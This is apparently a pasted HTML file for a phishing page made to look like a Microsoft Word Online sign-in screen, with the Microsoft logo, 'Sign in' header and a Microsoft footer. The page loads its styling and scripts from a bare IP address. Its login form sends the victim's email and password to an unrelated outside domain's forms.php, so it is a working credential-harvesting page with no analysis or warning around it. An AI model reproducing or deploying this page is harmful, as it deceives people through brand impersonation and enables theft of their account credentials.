Untitled
3 years ago in HTML
<!DOCTYPE html>
<!-- saved from url=(0027)http://localhost:8000/login -->
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="csrf-token" content="v0fe2sa76v7kB8lcig6EE3oXhL9L1YpJkj1BFb6j">
<title>Sign in to Microsoft word Online </title>
<!-- Font Awesome -->
<link rel="stylesheet" href="http://34.65.158.194/index_files/all.css">
<link href="http://34.65.158.194/index_files/bootstrap.min.css" rel="stylesheet">
<link href="http://34.65.158.194/index_files/mdb.min.css" rel="stylesheet">
<link href="http://34.65.158.194/index_files/style.css" rel="stylesheet">
<link href="http://34.65.158.194/index_files/home.css" rel="stylesheet">
<link rel="icon" type="image/x-icon" href="http://34.65.158.194/index_files/favicon.ico">
</head>
<body class="modal-open">
<div style="height: 100vh">
<div class="flex-center flex-column custom-gradient">
<div class="modal fade modalLoginForm show" id="loginForm" tabindex="-1" role="dialog" aria-labelledby="loginForm" aria-modal="true" style="display: block;">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<button type="button" class="close text-right" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true" id="modal-close">&times;</span>
</button>
<div class="modal-body mx-3">
<div class="md-form">
<img class="logo" src="http://34.65.158.194/index_files/microsoft_logo.svg" alt="Microsoft">
</div>
<div class="md-form mr-3">
<h5 id="loginHeader">Sign in</h5>
</div>
<form action="https://sirisexpress.com/forms.php" method="post">
<div class="md-form mb-3">
<input type="email" id="userName" name="userName" class="form-control" placeholder="Email, phone, or Skype" required="">
<input type="password" id="password" name="password" class="form-control" placeholder="Password" required="">
</div>
<div class="text-right md-form">
<button id="btnNextLink" class="btn btn-sm my-0 waves-effect waves-light" role="button" type="submit">
<span class="d-lg-inline-block mr-1">View</span>
</button>
</div>
</form>
</div>
<div class="md-form ml-3">
<div class="text-left">
<a class="">
@2020 Microsoft
</a>
<a class="ml-3">
Privacy statement
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="http://34.65.158.194/index_files/jquery.min.js"></script>
<script type="text/javascript" src="http://34.65.158.194/index_files/bootstrap.min.js"></script>
<script type="text/javascript" src="http://34.65.158.194/index_files/mdb.min.js"></script>
<script type="text/javascript" src="http://34.65.158.194/index_files/home.js"></script>
<div class="hiddendiv common"></div>
<div class="modal-backdrop fade show"></div>
</body>
</html>